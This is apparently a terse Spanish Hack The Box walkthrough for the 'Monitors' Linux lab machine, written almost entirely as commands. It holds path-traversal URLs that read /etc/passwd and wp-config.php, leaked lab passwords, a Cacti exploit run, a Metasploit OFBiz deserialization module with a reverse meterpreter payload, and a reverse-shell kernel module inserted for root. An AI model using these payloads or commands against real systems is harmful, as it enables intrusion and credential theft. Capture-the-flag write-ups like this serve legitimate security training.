# Monitors

**OS**: Linux \
**Dificultad**: Difícil
**Puntos**: 40

## Resumen

## Nmap Scan

## Enumeración

`wpscan --url http://monitors.htb/ -e ap`

`http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd`

`view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../..//wp-config.php`

```
wpadmin : BestAdministrator@2020!
```

`http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf`

```
10.10.10.238    monitors.htb cacti-admin.monitors.htb
```

`python3 49810.py -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost 10.10.14.33 --lport 1234`
`python -c 'import pty; pty.spawn("/bin/bash")'`

## Escalada de Privilegios (User)

`nc -w 10 10.10.10.238 4444 < /opt/linpeas.sh`
`nc -lvnp 4444 > linpeas.sh`

`nc -w 50 10.10.10.238 4444 < /opt/linux/pspy64`
`nc -lvnp 4444 > pspy64`

`grep 'marcus' /etc -R 2>/dev/null`
`cat /home/marcus/.backup/backup.sh`

```
marcus : VerticalEdge2020
```

`ssh marcus@10.10.10.238`

## Escalada de Privilegios (Root)

`netstat -putona`
`ssh -N -L 8443:127.0.0.1:8443 marcus@10.10.10.238`

`https://127.0.0.1:8443/`
`nmap -sV -sC -p 8443 127.0.0.1`

`use exploit/linux/http/apache_ofbiz_deserialization`
`set rhosts 127.0.0.1`
`set lhost 10.10.14.33`
`set lport 1234`
`set forceexploit true`
`set payload linux/x64/meterpreter_reverse_tcp`

`cd /tmp`
`upload /opt/linux/linpeas.sh`

`upload reverse-shell.c`
`upload Makefile`
`shell`
`python -c "import pty;pty.spawn('/bin/bash')"`
`make`
`insmod reverse-shell.ko`


## Referencias
https://www.exploit-db.com/exploits/44544 \
https://github.com/mekhalleh/rfi-wp_sprit \
https://www.exploit-db.com/exploits/49810 \
https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
